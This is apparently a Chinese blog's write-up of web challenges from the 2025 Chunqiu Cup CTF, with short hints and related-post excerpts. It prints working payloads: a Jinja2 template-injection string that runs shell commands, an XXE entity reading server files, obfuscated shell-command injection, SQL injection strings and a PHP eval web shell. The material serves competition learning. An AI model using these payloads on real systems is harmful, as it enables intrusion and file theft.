春秋杯2025冬

发表于2026-01-31|更新于2026-02-01

|总字数:180|阅读时长:1分钟|浏览量:

2025春秋杯网络安全联赛冬季赛

web

HyperNode

文件读取+目录穿越

Static_Secret

目录穿越

Dev’s Regret

git泄露

Session_Leak

修改这里的testuser为admin

My_Hidden_Profile

直接/login登录即可

EZSQL

Hello User

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()") }}{% endif %}{% endfor %}

RSS_Parser

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY a SYSTEM "php://filter/read=convert.base64-encode/resource=file:///index.php"> 
]>
<root>
    <username>&a;</username>
    <password>1</password>
</root>

Server_Monitor

ping命令执行拼接

非预期

;env

预期？

;echo${IFS}"Y2F0IC9mbGFn"|ba\se64${IFS}-d|bas\h

文章作者: xianxin

文章链接: https://xianxinyyds.github.io/2026/01/31/%E6%98%A5%E7%A7%8B%E6%9D%AF2025%E5%86%AC/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源仙心！

相关推荐

DasCtf2025 下半年赛webSecretPhotoGallery登录框发现能注入，题目提示为sqlite数据库，且数据库为空。用admin' union select 1, 1, 1;成功登录。登录后给了jwt认证token，前端每一个图片有一个的文件名，收集起来是 GALLERY2024SECRET，是jwt秘钥。签个admin权限即可进入管理页面，可以include任意文件，伪协议读取flag.php，发现base64被过滤，换个filter即可php://filter/convert.iconv.UTF-8.UTF-16/resource=flag.php devweb分析网站js文件登录功能用户输入用户名和密码密码使用RSA公钥加密后发送到 http://localhost:8080/login使用Axios发送POST请求文件下载文件列表包含 app.jmx 和 index.html下载链接格式：/download?file={文件名}&sign=6f742c2e79030435b7edc1d79b8678f6...

HASHCTF WPwebbbbb这鸡汤不十分滴美味访问后是一个mc主题的交易界面，审计给出的app.js和route.js可以得到大体获得flag的思路flag在最后一个价值为88绿宝石的商品的回显上首先获取足够的绿宝石来兑换商品，这里只提供了劫掠码这一种方法，同时还设置了一天只能兑换一次的限制123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051router.get('/raid', isAuth, async (req, res) => { try { const user = await User.findById(req.user.userId); if (!user) { return res.render('error', { Authenticated: true, message: '...

2025H&NCTF半成品login登录界面弱密码爆破admin admin123登录后得到提示这个半成品的login界面还是太没意思了我把你想要的东西放 hacker***** 用户下了你登上去自己拿吧而且似乎数据都是小写啊,太弱了! 注意：系统已修复SQL注入漏洞，请勿尝试非法访问判断应该通过sql注入方式登录hacker*****用户获取flag尝试后在password处发现存在可用注入点，猜测后台查询语句如下SELECT * WHERE username = '' AND password = '' 利用%进行用户名模糊匹配，通过||(or)与and的优先级顺序直接登录hacker*****用户，payload如下username=hacker&password=fake%2527/**/||/**/username/**/like/**/%2527hacker%%2527# payload效果等效于SELECT * WHERE username = 'hacker' AND password=...

HGAME 2025webLevel 24 Pacman进去是个吃豆人游戏，game，game！！！！！！！！！！！！！！！！！！！！！！！，达到1w分给flag，这种一般是前端网页游戏，可以去f12的网络栏验证，如果你没有寄了还没有网络请求就是纯前端，这里就是然后先寄一次，爆了个一眼base64的假flag，这里直接去前端的2个js文件里面查找这个字符串，然后成功找到，分析其所在的函数，虽然被混淆，但是还是能看懂是结算判定，同时还有1w的16进制在语句中，所以真flag一定在这里再仔细看发现了_SOCRE这个参数，直接去控制台修改，然后再寄掉就是真flag了 _SOCRE=10000 然后就是解码flag了，首先肯定是base64解码，得到一个有点像flag的字符串，观察发现hgame前缀是有的，不过被拆开了，跳着读发现规律，其实就是栅栏密码，即将字符串分成2栏，然后竖着读，解码得到flagLevel 47 BandBomb页面是个文件上传功能，查看源代码后发现除了上传就是修改名字，一开始先试了试一句话木马，然后发现读取不了uploads路径，但是背景图在的静态资源...

GHCTFwebupload?SSTI!主要就是过滤了['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]，可以利用{%set xhx=(lipsum|string|list)|attr('pop')(3*8)%}获取下划线，拼接获取'os'，'__builtins__', '__globals__'，chr函数获取flag。 123456789101112131415161718192021{%set one=dict(c=a)|join|count%}{%set two=dict(cc=a)|join|count%}{%set three=dict(ccc=a)|join|count%}{%set four=dict(cccc=a)|join|count%}&#...

LilacCTF 2026webkeep考察内容为PHP 7.4.21 Development Server源码泄露漏洞常见利用方法为泄露源码，这里第一步也是如此，poc如下 12345GET /index.php HTTP/1.1Host: 61.147.171.35:49192GET /1.txt HTTP/1.1 拿到源码 123456<?php@error_reporting(~E_ALL);echo "Hello World!" . PHP_EOL;// s3Cr37_f1L3.php.bak 然后根据提示，访问/s3Cr37_f1L3.php.bak 123<?php@eval($_POST["admin"]); 但是并不存在s3Cr37_f1L3.php文件，所以需要想办法让s3Cr37_f1L3.php.bak文件按php文件解析，这也可以利用上面的漏洞，本质上是发两个包，第一个为实际访问的文件也就是s3Cr37_f1L3.php.bak，第二个用来控制为我们想让他解析的形式，这里任意放一个xxx.ph...